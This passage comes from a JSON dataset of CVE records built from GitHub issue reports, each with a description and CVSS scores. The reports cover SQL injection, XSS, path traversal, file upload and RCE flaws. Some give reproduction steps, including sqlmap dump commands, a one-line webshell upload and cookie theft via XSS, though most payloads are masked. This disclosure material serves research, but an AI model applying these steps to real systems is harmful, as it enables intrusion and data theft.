  80734. "Issue_Url_old": "https://github.com/xiweicheng/tms/issues/16",
  80735. "Issue_Url_new": "https://github.com/xiweicheng/tms/issues/16",
  80736. "Repo_new": "xiweicheng/tms",
  80737. "Issue_Created_At": "2022-02-24T02:13:47Z",
  80738. "description": "There is an Insecure Permissions (broken access control) vulnerability in tms. FILETAG NUMBERTAG In order to verify the authenticity of the unauthorized-access (privilege escalation) vulnerability, I have prepared a system administrator account. Account name: admin, default password NUMBERTAG FILETAG Now I log in to the test account and try to change the information and password of the admin account. APITAG the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window. FILETAG FILETAG APITAG there is no need to verify the user's original password, so the new password can be set directly. Here, the password is set to change NUMBERTAG in the form submission, and other information is not changed. Open the Burp Suite intercepting proxy > click the confirm submit button. FILETAG APITAG the captured request data, as shown in the following figure. FILETAG APITAG forward to finish the modification. FILETAG Viewing the information of admin shows APITAG reproduction completed. FILETAG",
  80739. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  80740. "severity": "MEDIUM",
  80741. "baseScore": 5.9,
  80742. "impactScore": 3.6,
  80743. "exploitabilityScore": 2.2
  80744. },
  80745. {
  80746. "CVE_ID": "CVE-2022-26255",
  80747. "Issue_Url_old": "https://github.com/Fndroid/clash_for_windows_pkg/issues/2710",
  80748. "Issue_Url_new": "https://github.com/fndroid/clash_for_windows_pkg/issues/2710",
  80749. "Repo_new": "fndroid/clash_for_windows_pkg",
  80750. "Issue_Created_At": "2022-02-23T14:53:55Z",
  80751. "description": "APITAG Remote Code Execution NUMBERTAG Windows NUMBERTAG Windows NUMBERTAG APITAG I found a vulnerability in the clash_for_windows_pkg client that only needs a link to exploit \u590d\u73b0\u6b65\u9aa4 \u8fd9\u4e2a\u6f0f\u6d1e\u5371\u5bb3\u5f88\u5927\uff0c\u4e14\u6781\u5176\u5bb9\u6613\u5229\u7528\uff0c\u6211\u4e0d\u60f3\u5728\u4ed6\u88ab\u4fee\u590d\u4e4b\u524d\u516c\u5f00 This vulnerability is harmful and easy to exploit, I don't want to make it public until it is fixed",
  80752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80753. "severity": "CRITICAL",
  80754. "baseScore": 9.8,
  80755. "impactScore": 5.9,
  80756. "exploitabilityScore": 3.9
  80757. },
  80758. {
  80759. "CVE_ID": "CVE-2022-26260",
  80760. "Issue_Url_old": "https://github.com/wollardj/simple-plist/issues/60",
  80761. "Issue_Url_new": "https://github.com/wollardj/simple-plist/issues/60",
  80762. "Repo_new": "wollardj/simple-plist",
  80763. "Issue_Created_At": "2022-02-23T19:46:47Z",
  80764. "description": "Prototype Pollution using APITAG Hi, There's a prototype pollution vulnerability in APITAG related to the XML that is being parsed by it. In the following example the prototype pollution will affect the length property. ERRORTAG More information about the vulnerability: FILETAG",
  80765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80766. "severity": "CRITICAL",
  80767. "baseScore": 9.8,
  80768. "impactScore": 5.9,
  80769. "exploitabilityScore": 3.9
  80770. },
  80771. {
  80772. "CVE_ID": "CVE-2022-26268",
  80773. "Issue_Url_old": "https://github.com/hiliqi/xiaohuanxiong/issues/33",
  80774. "Issue_Url_new": "https://github.com/hiliqi/xiaohuanxiong/issues/33",
  80775. "Repo_new": "hiliqi/xiaohuanxiong",
  80776. "Issue_Created_At": "2022-02-11T02:54:01Z",
  80777. "description": "\u6f2b\u753bcms\u524d\u53f0\u5b58\u5728sql\u6ce8\u5165. FILETAG \u6f2b\u753b\u8be6\u60c5\u63a5\u53e3\u7684id\u53c2\u6570\u5b58\u5728sql\u6ce8\u5165 PATHTAG \u8fd9\u91cc\u83b7\u53d6\u53c2\u6570\u662fid FILETAG APITAG FILETAG",
  80778. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80779. "severity": "CRITICAL",
  80780. "baseScore": 9.8,
  80781. "impactScore": 5.9,
  80782. "exploitabilityScore": 3.9
  80783. },
  80784. {
  80785. "CVE_ID": "CVE-2022-26271",
  80786. "Issue_Url_old": "https://github.com/N1ce759/74cmsSE-Arbitrary-File-Reading/issues/1",
  80787. "Issue_Url_new": "https://github.com/n1ce759/74cmsse-arbitrary-file-reading/issues/1",
  80788. "Repo_new": "n1ce759/74cmsse-arbitrary-file-reading",
  80789. "Issue_Created_At": "2022-02-24T08:36:32Z",
  80790. "description": "APITAG Arbitrary File Read Vulnerability. Vulnerability Name: Arbitrary File Read Date of Discovery: PATHTAG Product version\uff1a APITAG APITAG : FILETAG Author: N1ce Vulnerability Description: The function is not verified or fails to be verified. The user can control the variable to read any file Code Analysis In PATHTAG , at line NUMBERTAG there is a file manipulation function where the $url is a parameter that the user can control and is not filtered, and $ourput_filename is the filename to be output FILETAG From this, we can build parameters: PATHTAG Prove Read the web site database configuration file. PS: I used FILETAG because I didn't configure Apache pseudo static FILETAG FILETAG Reading server files FILETAG FILETAG",
  80791. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  80792. "severity": "HIGH",
  80793. "baseScore": 7.5,
  80794. "impactScore": 3.6,
  80795. "exploitabilityScore": 3.9
  80796. },
  80797. {
  80798. "CVE_ID": "CVE-2022-26272",
  80799. "Issue_Url_old": "https://github.com/ionize/ionize/issues/403",
  80800. "Issue_Url_new": "https://github.com/ionize/ionize/issues/403",
  80801. "Repo_new": "ionize/ionize",
  80802. "Issue_Created_At": "2022-02-24T09:07:23Z",
  80803. "description": "RCE exists in Ionize NUMBERTAG PATHTAG file L NUMBERTAG The APITAG Key\" parameter of the installation page uri PATHTAG is not strictly filtered, and any string can be written to the PATHTAG file, resulting in arbitrary code execution. Vulnerability reason write configuration file directly without filtering Where the vulnerability occurs: URLTAG FILETAG Vulnerability Demo When installing to user settings, the value of the Encryption Key will be written to the configuration file PATHTAG FILETAG payload: APITAG Enter payload to submit FILETAG Ok, the payload has been successfully written into FILETAG try command execution FILETAG Bugfix Only letters and numbers are allowed, no other characters are allowed",
  80804. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80805. "severity": "CRITICAL",
  80806. "baseScore": 9.8,
  80807. "impactScore": 5.9,
  80808. "exploitabilityScore": 3.9
  80809. },
  80810. {
  80811. "CVE_ID": "CVE-2022-26276",
  80812. "Issue_Url_old": "https://github.com/helloxz/onenav/issues/44",
  80813. "Issue_Url_new": "https://github.com/helloxz/onenav/issues/44",
  80814. "Repo_new": "helloxz/onenav",
  80815. "Issue_Created_At": "2022-02-25T06:00:26Z",
  80816. "description": "APITAG has directory traversal with file inclusion that can lead to Getshell. \u6f0f\u6d1e\u7b80\u4ecb Vulnerability Introduction \u7531\u4e8e FILETAG APITAG \u6f0f\u6d1e\u5206\u6790 Vulnerability analysis \u5b58\u5728\u6f0f\u6d1e\u4ee3\u7801\uff1a Vulnerable codes\uff1a FILETAG CODETAG APITAG APITAG \uff0c\u7136\u540e\u62fc\u63a5\u540e\u8fdb\u884c\u6587\u4ef6\u5305\u542b\u3002 As shown below, the user controllable and unfiltered parameter APITAG exists in APITAG which is then spliced for file inclusion. FILETAG \u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5f62\u5982 APITAG \u6765\u5229\u7528php\u539f\u751f\u7684 APITAG \u6587\u4ef6\u4e0b\u8f7d\u6076\u610f\u6587\u4ef6\u3002 APITAG We can use a payload shaped like xxx to download malicious files using the php native APITAG file. FILETAG content: (if you have a php environment, use echo output, if you don't have a php environment, the content is just malicious code) APITAG APITAG The request will download the php file containing the malicious code within the server and output the path, and then use the path to traverse the path containing the malicious file to Getshell. \u6f0f\u6d1e\u590d\u73b0 Vulnerability Reproduction APITAG APITAG APITAG \uff0c\u8fd9\u4e2a\u76ee\u5f55\u4e0b\u5c31\u6709\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u7684 APITAG \u3002 \u6211\u4eec\u5f00\u542f\u4e00\u4e2a APITAG \u5b98\u65b9docker\u955c\u50cf\u641c\u7d22\uff0c\u53ef\u4ee5\u770b\u5230 APITAG \u6240\u5728\u4f4d\u7f6e\uff1a The complete environment of php will contain pecl, which is a command line tool used in PHP to manage extensions, and pear, which is a class library that pecl depends on. In any version of the Docker image, pcel/pear is installed by default in APITAG , and this directory contains APITAG , which we can use. We open a APITAG official docker image to search for it, and we can see where APITAG is located. 
FILETAG \u4f7f\u7528\u5b9d\u5854\uff08 FILETAG \uff09\u642d\u5efa\u7f51\u7ad9\u4e5f\u4f1a\u5b58\u5728\uff1a Building a website using Baota ( FILETAG can also present. FILETAG Mac\u73af\u5883\u4e0b\u4f7f\u7528MAMP\u5efa\u7ad9\u4e5f\u4f1a\u542b\u6709 APITAG \u6587\u4ef6\uff1a A Mac environment built with MAMP will also contain the APITAG file. FILETAG \u8fd9\u91cc\u6211\u4f7f\u7528\u5b98\u65b9docker APITAG \u505a\u6f14\u793a\uff0c Dockerfile \u4e0b\u8f7d\u5730\u5740\uff1a URLTAG \u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8def\u5f84\u7a7f\u8d8a\u5305\u542b APITAG \uff0c\u4f20\u5165\u4e0b\u8f7d\u6587\u4ef6\u7684payload\uff0c\u4e0b\u8f7d\u6076\u610f\u6587\u4ef6\u5230\u670d\u52a1\u5668\u3002 Here I use the official docker APITAG for a demo, Dockerfile download address: URLTAG So we can download the malicious file to the server by path traversal containing APITAG and passing in the payload of the downloaded file. APITAG FILETAG APITAG Then go ahead and include the malicious files to Getshell. APITAG FILETAG \u5176\u4ed6 \u5173\u4e8e APITAG \u7684\u8be6\u7ec6\u5229\u7528\u63cf\u8ff0\u53ef\u4ee5\u53c2\u8003p\u725b\u7684\u6587\u7ae0\uff1a FILETAG",
  80817. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  80818. "severity": "MEDIUM",
  80819. "baseScore": 5.3,
  80820. "impactScore": 1.4,
  80821. "exploitabilityScore": 3.9
  80822. },
  80823. {
  80824. "CVE_ID": "CVE-2022-26279",
  80825. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/22",
  80826. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/22",
  80827. "Repo_new": "weng-xianhu/eyoucms",
  80828. "Issue_Created_At": "2022-02-25T02:20:46Z",
  80829. "description": "Database backup Download . Author: A NUMBERTAG Submit date: PATHTAG Target: FILETAG APITAG NUMBERTAG UTF8 SP NUMBERTAG FILETAG APITAG The /data/sqldata directory has no access restrictions, so database backups can be downloaded by constructing the absolute path. Backup file names follow a predictable pattern ( NUMBERTAG SQL, i.e. yyyy / DD / h / min / S backup time plus version .SQL), so the names can be enumerated by a script in a batch fuzz test APITAG Background backup FILETAG Path FILETAG APITAG Batch fuzz test through script",
  80830. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80831. "severity": "CRITICAL",
  80832. "baseScore": 9.8,
  80833. "impactScore": 5.9,
  80834. "exploitabilityScore": 3.9
  80835. },
  80836. {
  80837. "CVE_ID": "CVE-2022-26280",
  80838. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/1672",
  80839. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/1672",
  80840. "Repo_new": "libarchive/libarchive",
  80841. "Issue_Created_At": "2022-02-25T08:52:19Z",
  80842. "description": "The libarchive library has a READ memory access vulnerability (an invalid memory read). Hello, while writing code that calls the archive_read_data function, I found a READ memory access vulnerability; see the picture! FILETAG",
  80843. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H",
  80844. "severity": "MEDIUM",
  80845. "baseScore": 6.5,
  80846. "impactScore": 4.2,
  80847. "exploitabilityScore": 2.2
  80848. },
  80849. {
  80850. "CVE_ID": "CVE-2022-26291",
  80851. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/206",
  80852. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/206",
  80853. "Repo_new": "ckolivas/lrzip",
  80854. "Issue_Created_At": "2021-08-02T11:46:06Z",
  80855. "description": "Multiple concurrency UAF bugs between the APITAG and APITAG functions. Dear all, Our tool reports multiple concurrency use-after-free bugs between the APITAG function and the APITAG function in the newest master branch NUMBERTAG afe8. Brief Explanation The related code, simplified from APITAG and ERRORTAG , is shown as follows: ERRORTAG Both thread T0 and thread T1 operate on the shared variable ucthread (i.e., T0 deallocates a ucthread through APITAG , and T1 uses the ucthread in the statements ERRORTAG , APITAG , and APITAG ). A use after free occurs if the deallocation of ucthread happens before one of those uses. For example, the following three thread interleavings each trigger a different UAF: Interleaving (a) ERRORTAG Interleaving (b) ERRORTAG Interleaving (c) ERRORTAG Reproduce through delay injection To reproduce these use-after-free errors, we can insert two delays (e.g., APITAG ) into the original source code. For example, to reproduce interleaving (a) mentioned earlier, insert a delay before the APITAG statement in the function in APITAG , and another delay after it, as shown below. ERRORTAG FILETAG Compile the program: APITAG Download the testcase (I uploaded the POC here; please unzip it first). FILETAG Run the testcase with the following command: APITAG Then you will see the use-after-free bug report. Here is the trace reported by ASAN: ERRORTAG I'm not sure whether these use-after-free bugs could cause serious harm. I hope you can check whether it is necessary to fix these bugs. Thanks.",
  80856. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  80857. "severity": "MEDIUM",
  80858. "baseScore": 5.5,
  80859. "impactScore": 3.6,
  80860. "exploitabilityScore": 1.8
  80861. },
  80862. {
  80863. "CVE_ID": "CVE-2022-26296",
  80864. "Issue_Url_old": "https://github.com/riscv-boom/riscv-boom/issues/577",
  80865. "Issue_Url_new": "https://github.com/riscv-boom/riscv-boom/issues/577",
  80866. "Repo_new": "riscv-boom/riscv-boom",
  80867. "Issue_Created_At": "2021-11-09T00:36:07Z",
  80868. "description": "New transient execution attack on Boom.. APITAG Type of issue : bug report APITAG APITAG Impact : rtl refactoring APITAG Development Phase : proposal Hi, I found a new transient execution attack on RISC-V BOOM. The attack relies on bug NUMBERTAG which was originally reported as a performance bug. The same bug can also be used to transiently poison the BIM table using a transiently accessed secret. The attached APITAG attack is a Meltdown-type attack in which supervisor-mode software transiently leaks a secret from machine-mode software (i.e., either firmware or an enclave). The attack is based on two vulnerabilities: NUMBERTAG BOOM transiently executes a load instruction before checking for a PMP violation, and NUMBERTAG the BIM table can be transiently updated using the accessed value, which serves as the side channel instead of the cache. The attack is considerably slower than using the D-cache as a side channel, but it still works and retrieves the secret value (i.e NUMBERTAG deadbeef ) almost correctly. Used boom commit: d NUMBERTAG c2c3f How to reproduce the attack: APITAG This can be mitigated by fixing either one of the two bugs above. FILETAG",
  80869. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  80870. "severity": "MEDIUM",
  80871. "baseScore": 5.5,
  80872. "impactScore": 3.6,
  80873. "exploitabilityScore": 1.8
  80874. },
  80875. {
  80876. "CVE_ID": "CVE-2022-26301",
  80877. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/11",
  80878. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/11",
  80879. "Repo_new": "yeyinshi/tuzicms",
  80880. "Issue_Created_At": "2022-02-28T02:50:16Z",
  80881. "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG { //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") APITAG The $id value is interpolated directly into the where() condition (\"id=$id\") without parameter binding, which is a SQL injection. POC: URLTAG",
  80882. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80883. "severity": "CRITICAL",
  80884. "baseScore": 9.8,
  80885. "impactScore": 5.9,
  80886. "exploitabilityScore": 3.9
  80887. },
  80888. {
  80889. "CVE_ID": "CVE-2022-26315",
  80890. "Issue_Url_old": "https://github.com/claudiodangelis/qrcp/issues/223",
  80891. "Issue_Url_new": "https://github.com/claudiodangelis/qrcp/issues/223",
  80892. "Repo_new": "claudiodangelis/qrcp",
  80893. "Issue_Created_At": "2022-02-28T14:59:45Z",
  80894. "description": "Directory Traversal Vulnerability. While qrcp is running in receive mode, the uploader can edit the file name in the HTTP request and add \"../\". qrcp does not validate the file name, which leads to directory traversal: an uploaded file can be written outside the intended receive directory. Env: qrcp NUMBERTAG Windows NUMBERTAG Ubuntu NUMBERTAG Poc: APITAG APITAG APITAG credit: starryloki,lu0sf",
  80895. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  80896. "severity": "MEDIUM",
  80897. "baseScore": 5.3,
  80898. "impactScore": 1.4,
  80899. "exploitabilityScore": 3.9
  80900. },
  80901. {
  80902. "CVE_ID": "CVE-2022-26533",
  80903. "Issue_Url_old": "https://github.com/Xhofe/alist/issues/645",
  80904. "Issue_Url_new": "https://github.com/alist-org/alist/issues/645",
  80905. "Repo_new": "alist-org/alist",
  80906. "Issue_Created_At": "2022-03-01T03:38:23Z",
  80907. "description": "Alist has a Cross Site Scripting (XSS) vulnerability. Alist Version / Alist NUMBERTAG Describe the bug / \u95ee\u9898\u63cf\u8ff0 Vulnerability Introduction A route in Alist that uses user-supplied parameters when displaying XML files, without filtering them, allows XSS. Vulnerability affects version NUMBERTAG Vulnerability Analysis A new route was added in Alist NUMBERTAG APITAG , which lets users control the data parameter in the path. FILETAG Simplified code: ERRORTAG The incoming data is decoded by character replacement (restoring the base NUMBERTAG characters that conflict with URL syntax), and then the parameter u is concatenated directly into the page output without escaping, so we can use this to construct an XSS payload. APITAG The payload is base NUMBERTAG encoded as follows: APITAG Replace APITAG with APITAG , then splice it into the path: APITAG Vulnerability Exploitation After a successful local exploit, try using the official demo site to test: FILETAG Reproduction / \u590d\u73b0\u94fe\u63a5 URLTAG \u65e5\u5fd7 / Logs _No response_",
  80908. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  80909. "severity": "MEDIUM",
  80910. "baseScore": 6.1,
  80911. "impactScore": 2.7,
  80912. "exploitabilityScore": 2.8
  80913. },
  80914. {
  80915. "CVE_ID": "CVE-2022-26534",
  80916. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2211",
  80917. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2211",
  80918. "Repo_new": "fisco-bcos/fisco-bcos",
  80919. "Issue_Created_At": "2022-03-01T11:02:17Z",
  80920. "description": "The nodes change view frequently and stop generating blocks.. Describe the bug I started a chain with NUMBERTAG nodes, one of which is malicious: it modifies the values of some fields of a message. After starting the group, I started the stress testing program, and the program got stuck. The log shows that the nodes stop producing new blocks and keep changing view, i.e. a single malicious node can halt block production. To Reproduce Steps to reproduce the behavior NUMBERTAG Start a chain with NUMBERTAG nodes NUMBERTAG Start the stress testing program NUMBERTAG The error occurs Expected behavior Nodes produce blocks normally. Screenshots The stress testing program is stuck here NUMBERTAG of the transactions are received) APITAG Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS Version NUMBERTAG rc2 (master branch) Additional context The log files: FILETAG",
  80921. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  80922. "severity": "HIGH",
  80923. "baseScore": 7.5,
  80924. "impactScore": 3.6,
  80925. "exploitabilityScore": 3.9
  80926. },
  80927. {
  80928. "CVE_ID": "CVE-2022-26565",
  80929. "Issue_Url_old": "https://github.com/totaljs/cms/issues/35",
  80930. "Issue_Url_new": "https://github.com/totaljs/cms/issues/35",
  80931. "Repo_new": "totaljs/cms",
  80932. "Issue_Created_At": "2022-02-27T06:16:08Z",
  80933. "description": "Security Issue Cross Site Scripting APITAG Description APITAG ERRORTAG Hello APITAG I am reporting a security issue. When an administrator creates a page and supplies an XSS payload (APITAG) as the page name, the script is executed whenever the page list is viewed (stored XSS). APITAG If you want to verify this, go to URLTAG and log in with the account above.",
  80934. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  80935. "severity": "MEDIUM",
  80936. "baseScore": 4.8,
  80937. "impactScore": 2.7,
  80938. "exploitabilityScore": 1.7
  80939. },
  80940. {
  80941. "CVE_ID": "CVE-2022-26573",
  80942. "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/840",
  80943. "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/840",
  80944. "Repo_new": "magicblack/maccms10",
  80945. "Issue_Created_At": "2022-03-02T05:24:33Z",
  80946. "description": "There are multiple reflected XSS vulnerabilities in the website. Vulnerability APITAG XSS Vulnerability APITAG risk Affected APITAG Vulnerability APITAG APITAG are some places I found NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1aselect & input NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1awd NUMBERTAG url\uff1a URLTAG Affected parameters\uff1arepeat Verification process\uff1a Stealing administrator cookies through reflected XSS\uff1a First, the administrator logs in to the backend FILETAG Then we craft a payload that steals cookies via the vulnerable APITAG send it to the victim, or get it executed by other means. For example, here I choose this URL\uff1a FILETAG The other URLs work the same way\uff1a FILETAG FILETAG Repair method NUMBERTAG HTML-escape the input data when it is output so that it is not interpreted as executable script APITAG the data against a whitelist of allowed tags and attributes to strip executable content (such as the script tag, the onerror attribute of the img tag, etc.)",
  80947. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  80948. "severity": "MEDIUM",
  80949. "baseScore": 6.1,
  80950. "impactScore": 2.7,
  80951. "exploitabilityScore": 2.8
  80952. },
  80953. {
  80954. "CVE_ID": "CVE-2022-26605",
  80955. "Issue_Url_old": "https://github.com/Chu1z1/Chuizi/issues/1",
  80956. "Issue_Url_new": "https://github.com/chu1z1/chuizi/issues/1",
  80957. "Repo_new": "chu1z1/chuizi",
  80958. "Issue_Created_At": "2022-03-03T09:57:08Z",
  80959. "description": "APITAG APITAG APITAG Arbitrary file download. APITAG APITAG APITAG Arbitrary file download \u9700\u8981\u767b\u9646\u5230\u5fb7\u5b9e\u4efb\u610f\u7528\u6237\u624d\u53ef\u4ee5\u5229\u7528 An attacker must be logged in as any (arbitrary) user to exploit the vulnerability. The avatar-upload interface returns a key generated from the uploaded file's path; by modifying the path from which the key is generated, an attacker can produce a malicious key and then pass it to the avatar file-reading interface, resulting in arbitrary file download APITAG \u7528\u6237\u754c\u9762 UI FILETAG \u4e0a\u4f20\u6587\u4ef6 Upload file FILETAG \u53ef\u4ee5\u4fee\u6539\u8fd4\u56de\u8def\u5f84\u4e5f\u53ef\u4ee5\u66f4\u6539\u4e0b\u4e00\u4e2a\u5305\u7684\u8def\u5f84\u83b7\u53d6key You can modify the returned path, or change the path in the next request, to obtain the key FILETAG FILETAG APITAG \u6f0f\u6d1e\u5229\u7528\u6210\u529f Successful exploit FILETAG APITAG Do not infiltrate illegally! Do not penetrate without authorization! Please do not use this vulnerability for illegal and criminal activities! This article is for learning only! The consequences of breaking the law have nothing to do with the author!",
  80960. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  80961. "severity": "HIGH",
  80962. "baseScore": 8.8,
  80963. "impactScore": 5.9,
  80964. "exploitabilityScore": 2.8
  80965. },
  80966. {
  80967. "CVE_ID": "CVE-2022-26607",
  80968. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/9",
  80969. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/9",
  80970. "Repo_new": "baigostudio/baigocms",
  80971. "Issue_Created_At": "2022-03-03T09:35:22Z",
  80972. "description": "FILETAG NUMBERTAG Upload a webshell . A one-line webshell is recommended . E.g : <?php APITAG FILETAG Then splice the website path (concatenate the host with the uploaded file's path) \uff1a http:// FILETAG FILETAG APITAG FILETAG FILETAG",
  80973. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  80974. "severity": "HIGH",
  80975. "baseScore": 7.2,
  80976. "impactScore": 5.9,
  80977. "exploitabilityScore": 1.2
  80978. },
  80979. {
  80980. "CVE_ID": "CVE-2022-26613",
  80981. "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/14",
  80982. "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/14",
  80983. "Repo_new": "harshitbansal373/php-cms",
  80984. "Issue_Created_At": "2022-03-03T15:50:07Z",
  80985. "description": "SQL injection in categorymenu page. Description I found a SQL injection vulnerability in the page FILETAG and built a local environment to test it. The url is FILETAG FILETAG The problem code is here. CODETAG Users control the GET parameter \"category\", which is used without any filtering, and can thereby retrieve data that should not be APITAG as, if \"category\" is changed to something like NUMBERTAG union select APITAG we obtain the database user: FILETAG Proof I used sqlmap to do this. APITAG database information. sqlmap u URLTAG dbs FILETAG APITAG a database and get table information sqlmap u URLTAG D cms tables FILETAG APITAG a table and get the columns sqlmap u URLTAG D cms T users columns FILETAG APITAG the columns and get column contents. sqlmap u URLTAG D cms T users C username dump FILETAG Solution You can mitigate this by adding filter rules on the parameter \"category\", such as rejecting letters; the robust fix is to use prepared statements with bound parameters (the value appears to be numeric, so it could also be cast to an integer before use).",
  80986. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  80987. "severity": "CRITICAL",
  80988. "baseScore": 9.8,
  80989. "impactScore": 5.9,
  80990. "exploitabilityScore": 3.9
  80991. },
  80992. {
  80993. "CVE_ID": "CVE-2022-26613",
  80994. "Issue_Url_old": "https://github.com/harshitbansal373/PHP-CMS/issues/15",
  80995. "Issue_Url_new": "https://github.com/harshitbansal373/php-cms/issues/15",
  80996. "Repo_new": "harshitbansal373/php-cms",
  80997. "Issue_Created_At": "2022-04-11T12:03:05Z",
  80998. "description": "Multiple SQLi. Hello, dear, web developer! You have serious problems, dear web developer! Multiple SQLi STATUS Critical! =) Dude, you must delete this project, please! What kind of web developer are you? \ud83d\ude32 Infected apps : CODETAG Payloads: ERRORTAG Dump: ERRORTAG BR MENTIONTAG Penetration Testing Engineer",
  80999. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81000. "severity": "CRITICAL",
  81001. "baseScore": 9.8,
  81002. "impactScore": 5.9,
  81003. "exploitabilityScore": 3.9
  81004. },
  81005. {
  81006. "CVE_ID": "CVE-2022-26619",
  81007. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1702",
  81008. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1702",
  81009. "Repo_new": "halo-dev/halo",
  81010. "Issue_Created_At": "2022-03-04T10:30:01Z",
  81011. "description": "Halo Blog APITAG Fileupload without file type authentication NUMBERTAG APITAG NUMBERTAG Fat Jar \u5728\u7ebf\u7ad9\u70b9\u5730\u5740 URLTAG \u53d1\u751f\u4e86\u4ec0\u4e48\uff1f The vulnerability can lead to the upload of arbitrary malicious script files. \u76f8\u5173\u65e5\u5fd7\u8f93\u51fa shell no \u9644\u52a0\u4fe1\u606f Black box penetration NUMBERTAG Use (demo:P APITAG to login in URLTAG ,and then find the attachment upload feature ,try to upload a random image. FILETAG NUMBERTAG While uploading a random image, use burp suite to catch the request packet and forward it to the Repeater module. FILETAG NUMBERTAG You can tell we successfully uploaded the image from the screenshot below . And we can also get the path of the image accordding to the response. FILETAG NUMBERTAG Now we want to use the feature again. This time ,try to change the file suffix and modify the file content at the same time. After doing that , send the request again. And the upload is still successful , the file path is also returned. FILETAG NUMBERTAG Now try to access the file path within the url below,and our xss payload successfully executed FILETAG NUMBERTAG Screenshots of other file types uploaded are as follows\uff1a FILETAG FILETAG Source code review\uff1a Try to download the source code for source code security analysis FILETAG APITAG version NUMBERTAG FILETAG NUMBERTAG Check the source code and locate the class PATHTAG According to the annotations of this class, you can find that all requests to the path PATHTAG will access this class. FILETAG NUMBERTAG The /upload path accessed by the upload interface will access the APITAG method of this class. 
FILETAG NUMBERTAG As you can see, this method receives the file from the client side, passes the file object as an argument to the APITAG method of the APITAG class, and then passes that result as an argument to the APITAG method of the APITAG class NUMBERTAG So let's locate the PATHTAG class, follow the APITAG method first, and dive into the APITAG method FILETAG NUMBERTAG You can see that the code performs no check on the file suffix; the APITAG method finally returns a create(attachment) object. Following on to the APITAG method, you can see that an Attachment object is returned, again with no check on the file. FILETAG NUMBERTAG The returned object is passed as an argument to the APITAG method of the PATHTAG class, in which the code writes the path of the uploaded file into the APITAG instance object; there is no permission check here either, and finally the method returns an APITAG instance object. FILETAG NUMBERTAG Once the file path is set, it is placed in the response packet and returned to the client, so we can access the uploaded file using the path information from the response NUMBERTAG From the analysis of the above code, there is no logic anywhere that checks the file suffix, file content or file format, so the endpoint allows arbitrary file upload.",
  81012. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  81013. "severity": "HIGH",
  81014. "baseScore": 7.5,
  81015. "impactScore": 3.6,
  81016. "exploitabilityScore": 3.9
  81017. },
  81018. {
  81019. "CVE_ID": "CVE-2022-26630",
  81020. "Issue_Url_old": "https://github.com/guodongtech/jellycms/issues/1",
  81021. "Issue_Url_new": "https://github.com/guodongtech/jellycms/issues/1",
  81022. "Repo_new": "guodongtech/jellycms",
  81023. "Issue_Created_At": "2022-03-05T08:07:50Z",
